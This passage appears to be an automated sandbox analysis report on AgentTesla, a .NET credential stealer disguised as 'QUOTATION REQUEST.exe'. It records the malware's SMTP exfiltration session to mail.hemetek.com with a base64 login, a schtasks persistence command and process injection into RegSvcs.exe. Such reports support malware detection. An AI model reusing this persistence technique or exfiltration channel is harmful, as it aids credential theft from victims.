                                                                .rsrc0x1400000x69da80x69e00False0.226857659386data5.50599821822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1aa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0x1402680x42028dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 889192448, next used block 872415232
                                                                RT_ICON0x1822900x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 721420288, next used block 721420288
                                                                RT_ICON0x192ab80x94a8data
                                                                RT_ICON0x19bf600x5488data
                                                                RT_ICON0x1a13e80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 128, next used block 0
                                                                RT_ICON0x1a56100x25a8data
                                                                RT_ICON0x1a7bb80x10a8data
                                                                RT_ICON0x1a8c600x988data
                                                                RT_ICON0x1a95e80x468GLS_BINARY_LSB_FIRST
                                                                RT_GROUP_ICON0x1a9a500x84data
                                                                RT_VERSION0x1a9ad40x2d4data

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyright5
                                                                Assembly Version6.6.1.6
                                                                InternalName.exe
                                                                FileVersion6.6.1.6
                                                                CompanyNameFILE
                                                                LegalTrademarksDOC
                                                                Commentsd
                                                                ProductNameG
                                                                ProductVersion6.6.1.6
                                                                FileDescriptionHI
                                                                OriginalFilename.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                11/22/20-08:26:51.209330TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49738587192.168.2.3107.6.134.138

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 22, 2020 08:26:34.073470116 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:34.190696955 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:34.192318916 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:39.856792927 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:39.858262062 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:39.975436926 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.387294054 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.389955997 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:50.507181883 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.573896885 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.575098038 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:50.692245007 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.743221998 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.744074106 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:50.861152887 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.897022963 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:50.897711039 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.053158045 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:51.053877115 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.207425117 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:51.209330082 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.209618092 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.210664034 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.210798025 CET49738587192.168.2.3107.6.134.138
                                                                Nov 22, 2020 08:26:51.326652050 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:51.333277941 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:51.452657938 CET58749738107.6.134.138192.168.2.3
                                                                Nov 22, 2020 08:26:51.505564928 CET49738587192.168.2.3107.6.134.138

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 22, 2020 08:24:50.245567083 CET5598453192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:50.281258106 CET53559848.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:51.614773989 CET6418553192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:51.652817965 CET53641858.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:52.413269043 CET6511053192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:52.449085951 CET53651108.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:53.320662022 CET5836153192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:53.356560946 CET53583618.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:54.264661074 CET6349253192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:54.300576925 CET53634928.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:54.994679928 CET6083153192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:55.030216932 CET53608318.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:55.741210938 CET6010053192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:55.777076960 CET53601008.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:56.643266916 CET5319553192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:56.670463085 CET53531958.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:57.319308996 CET5014153192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:57.355084896 CET53501418.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:58.132289886 CET5302353192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:58.159516096 CET53530238.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:58.967287064 CET4956353192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:59.003216028 CET53495638.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:24:59.856197119 CET5135253192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:24:59.883467913 CET53513528.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:00.512918949 CET5934953192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:00.540184975 CET53593498.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:01.332098961 CET5708453192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:01.367949963 CET53570848.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:16.150660038 CET5882353192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:16.178002119 CET53588238.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:28.083158016 CET5756853192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:28.121965885 CET53575688.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:30.707740068 CET5054053192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:30.751581907 CET53505408.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:39.923327923 CET5436653192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:39.950448990 CET53543668.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:40.038475990 CET5303453192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:40.065584898 CET53530348.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:50.122220039 CET5776253192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:50.189070940 CET53577628.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:25:52.914247990 CET5543553192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:25:52.951704979 CET53554358.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:26:24.505932093 CET5071353192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:26:24.533684969 CET53507138.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:26:26.002520084 CET5613253192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:26:26.052819967 CET53561328.8.8.8192.168.2.3
                                                                Nov 22, 2020 08:26:33.900507927 CET5898753192.168.2.38.8.8.8
                                                                Nov 22, 2020 08:26:34.056978941 CET53589878.8.8.8192.168.2.3

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Nov 22, 2020 08:26:33.900507927 CET192.168.2.38.8.8.80x8e7aStandard query (0)mail.hemetek.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Nov 22, 2020 08:26:34.056978941 CET8.8.8.8192.168.2.30x8e7aNo error (0)mail.hemetek.com107.6.134.138A (IP address)IN (0x0001)

                                                                SMTP Packets

                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Nov 22, 2020 08:26:39.856792927 CET58749738107.6.134.138192.168.2.3220-dotsmail.itsoul.com ESMTP Exim 4.93 #2 Sun, 22 Nov 2020 12:56:38 +0530
                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                220 and/or bulk e-mail.
                                                                Nov 22, 2020 08:26:39.858262062 CET49738587192.168.2.3107.6.134.138EHLO 609290
                                                                Nov 22, 2020 08:26:50.387294054 CET58749738107.6.134.138192.168.2.3250-dotsmail.itsoul.com Hello 609290 - 84.17.52.25 - [127.0.0.1]
                                                                250-STARTTLS
                                                                250-SIZE 52428800
                                                                250-8BITMIME
                                                                250-AUTH PLAIN LOGIN
                                                                250-SIZE 52428800
                                                                250 HELP
                                                                Nov 22, 2020 08:26:50.389955997 CET49738587192.168.2.3107.6.134.138AUTH login ZGVsQGhlbWV0ZWsuY29t
                                                                Nov 22, 2020 08:26:50.573896885 CET58749738107.6.134.138192.168.2.3334 UGFzc3dvcmQ6
                                                                Nov 22, 2020 08:26:50.743221998 CET58749738107.6.134.138192.168.2.3235 Authentication succeeded
                                                                Nov 22, 2020 08:26:50.744074106 CET49738587192.168.2.3107.6.134.138MAIL FROM:<del@hemetek.com>
                                                                Nov 22, 2020 08:26:50.897022963 CET58749738107.6.134.138192.168.2.3250 OK
                                                                Nov 22, 2020 08:26:50.897711039 CET49738587192.168.2.3107.6.134.138RCPT TO:<del@hemetek.com>
                                                                Nov 22, 2020 08:26:51.053158045 CET58749738107.6.134.138192.168.2.3250 Accepted
                                                                Nov 22, 2020 08:26:51.053877115 CET49738587192.168.2.3107.6.134.138DATA
                                                                Nov 22, 2020 08:26:51.207425117 CET58749738107.6.134.138192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                Nov 22, 2020 08:26:51.210798025 CET49738587192.168.2.3107.6.134.138.
                                                                Nov 22, 2020 08:26:51.452657938 CET58749738107.6.134.138192.168.2.3250 OK id=1kgjlq-0000xl-99

                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:08:24:54
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\Desktop\QUOTATION REQUEST.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
                                                                Imagebase:0x3c0000
                                                                File size:1733120 bytes
                                                                MD5 hash:4F4F697ADC79894CEEC42D5752B2790E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Start time:08:25:01
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
                                                                Imagebase:0xb60000
                                                                File size:185856 bytes
                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:01
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:02
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:{path}
                                                                Imagebase:0xef0000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:30
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
                                                                Imagebase:0x640000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Antivirus matches:
                                                                • Detection: 0%, Metadefender, Browse
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:30
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:08:25:38
                                                                Start date:22/11/2020
                                                                Path:C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
                                                                Imagebase:0x5a0000
                                                                File size:45152 bytes
                                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:moderate

                                                                General

                                                                Start time:08:25:38
                                                                Start date:22/11/2020
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >